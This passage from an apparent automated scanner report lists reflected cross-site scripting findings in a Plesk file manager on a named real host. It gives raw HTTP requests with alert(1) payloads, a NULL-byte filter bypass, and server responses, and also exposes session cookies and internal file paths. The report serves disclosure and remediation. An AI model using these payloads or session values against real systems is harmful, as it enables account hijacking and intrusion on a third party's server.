NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/?cmd=chdirabec1<script>alert(1)</script>cc1f852f1be&file=/%2F HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:36:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:36:21 GMT
Content-Length: 697

ERROR: PleskFatalException
Command not found: chdirabec1<script>alert(1)</script>cc1f852f1be

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: common_func.php3:73
   psaerror(string 'Command not found: chdirabec1<script>
...[SNIP]...

2.4. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/create-dir/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload %0081c49<a>cec4ffa66c1 was submitted in the cmd parameter. This input was echoed as 81c49<a>cec4ffa66c1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /plesk/client@3/domain@2/hosting/file-manager/create-dir/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/
Cookie: filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl
Content-Type: multipart/form-data; boundary=---------------------------35911218915787
Content-Length: 1173

-----------------------------35911218915787
Content-Disposition: form-data; name="forgery_protection_token"

6d786a85db2c64fc482c76c395bb6516
-----------------------------35911218915787
Content-Disposition: form-data; name="cmd"

new_dir%0081c49<a>cec4ffa66c1
-----------------------------35911218915787
Content-Disposition: form-data; name="lock"

true
-----------------------------35911218915787
Content-Disposition: form-data; name="previous_page"

...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:46:56 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:46:58 GMT
Content-Length: 530

ERROR: PleskFatalException
Command not found: new_dir%0081c49<a>cec4ffa66c1

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /admin/webmail/

0: common_func.php3:73
   psaerror(string 'Command not found: new_dir%0081c
...[SNIP]...

2.5. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/edit/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload %00178b8<a>3bd660abafb was submitted in the cmd parameter. This input was echoed as 178b8<a>3bd660abafb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/edit/?cmd=chdir%00178b8<a>3bd660abafb&file=%2F HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:05:38 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:05:39 GMT
Connection: close
Content-Length: 486

ERROR: PleskFatalException
Command not found: chdir

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: common_func.php3:73
   psaerror(string 'Command not found: chdir.178b8<a>3bd660abafb')
1: cList.php:160
   cList->
...[SNIP]...

2.6. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/edit/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload 67aae<script>alert(1)</script>99723f57884 was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/edit/?cmd=edit67aae<script>alert(1)</script>99723f57884&file=.Security HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:18:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:18:46 GMT
Connection: close
Content-Length: 566

ERROR: PleskFatalException
Command not found: edit67aae<script>alert(1)</script>99723f57884

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: common_func.php3:73
   psaerror(string 'Command not found: edit67aae<script>
...[SNIP]...

2.7. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/edit/

Issue detail

The value of the file request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deb3e'-alert(1)-'94f27f8347 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/edit/?cmd=edit&file=.Securitydeb3e'-alert(1)-'94f27f8347 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:08 GMT
Connection: close
Content-Length: 1480

ERROR: PleskBadURIException
Invalid URI: plesk

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: UIPointer.php:40
   UIPointer::pars
...[SNIP]...
f8347': (2) The system cannot find the file specified.
at execute "C:\Program Files (x86)\Parallels\Plesk\/admin/bin/filemng" nosedive cat "C:/Inetpub/vhosts/nosedivesailing.com/httpdocs/.Securitydeb3e'-alert(1)-'94f27f8347"(RunTime::RunAsUser::run line 272)', string '//httpdocs/', string '.Securitydeb3e'-alert(1)-'94f27f8347', string 'UTF-8')
7: FileManagerUIPointer.php:735
   FileManagerUIPointer->
...[SNIP]...

2.8. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/edit/

Issue detail

The value of the file request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d06b0(a)5e934286320 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/edit/?cmd=edit&file=.Securityd06b0(a)5e934286320 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:28 GMT
Connection: close
Content-Length: 1454

ERROR: PleskBadURIException
Invalid URI: plesk

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: UIPointer.php:40
   UIPointer::pars
...[SNIP]...
file_manager__edit)
5: Form.php:144
   Form->assign()
6: class.FileManagerForm.php:769
   FileManagerForm->assignEdit(string 'Unable to create file 'C:\Inetpub\vhosts\nosedivesailing.com\httpdocs\.Securityd06b0(a)5e934286320': (2) The system cannot find the file specified.
at execute "C:\Program Files (x86)\Parallels\Plesk\/admin/bin/filemng" nosedive cat C:/Inetpub/vhosts/nosedivesailing.com/httpdocs/.Securityd06b0(
...[SNIP]...

2.9. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/ [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/permissions/

Issue detail

The value of the fname request parameter is copied into the HTML document as plain text between tags. The payload 925be<script>alert(1)</script>39fff24762d was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs925be<script>alert(1)</script>39fff24762d HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:17:41 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:17:43 GMT
Connection: close
Content-Length: 824

ERROR: PleskFatalException
FileManager::get_file_info_wrapper() failed: filemng util failed: Unable to get the object (C:/Inetpub/vhosts/nosedivesailing.com/httpdocs925be<script>alert(1)</script>39fff24762d) security info: (123) The filename, directory name, or volume label syntax is incorrect.
at execute "C:\Program Files (x86)\Parallels\Plesk\/admin/bin/filemng" nosedive --permissions --list-common
...[SNIP]...

2.10. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/rename/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload 10699<script>alert(1)</script>23a3a0638be was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/rename/?cmd=rename_dir10699<script>alert(1)</script>23a3a0638be&file=anon_ftp HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:01 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:02 GMT
Connection: close
Content-Length: 584

ERROR: PleskFatalException
Command not found: rename_dir10699<script>alert(1)</script>23a3a0638be

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: common_func.php3:73
   psaerror(string 'Command not found: rename_dir10699<script>
...[SNIP]...

2.11. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/rename/

Issue detail

The value of the file request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8260'%3b771f75a4648 was submitted in the file parameter. This input was echoed as a8260';771f75a4648 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/rename/?cmd=rename_dir&file=anon_ftpa8260'%3b771f75a4648 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:20 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:20 GMT
Connection: close
Content-Length: 1071

ERROR: PleskBadURIException
Invalid URI: plesk

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: UIPointer.php:40
   UIPointer::pars
...[SNIP]...
ject of type plesk__client__domain__hosting__file_manager__rename)
5: Form.php:144
   Form->assign()
6: class.FileManagerForm.php:534
   FileManagerForm->assignRename(string '//httpdocs/', string 'anon_ftpa8260';771f75a4648', string 'dir')
7: FileManagerUIPointer.php:230
   FileManagerUIPointer->
...[SNIP]...

2.12. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/rename/

Issue detail

The value of the file request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8beeb'-alert(1)-'a3815e9b091 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/rename/?cmd=rename_dir&file=statistics8beeb'-alert(1)-'a3815e9b091 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:20:19 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:20:20 GMT
Connection: close
Content-Length: 1083

ERROR: PleskBadURIException
Invalid URI: plesk

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: UIPointer.php:40
   UIPointer::pars
...[SNIP]...
ct of type plesk__client__domain__hosting__file_manager__rename)
5: Form.php:144
   Form->assign()
6: class.FileManagerForm.php:534
   FileManagerForm->assignRename(string '//httpdocs/', string 'statistics8beeb'-alert(1)-'a3815e9b091', string 'dir')
7: FileManagerUIPointer.php:230
   FileManagerUIPointer->
...[SNIP]...

2.13. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/view/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload ba55a<script>alert(1)</script>fc21a60d71f was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/view/?cmd=downloadba55a<script>alert(1)</script>fc21a60d71f&file=.Security HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
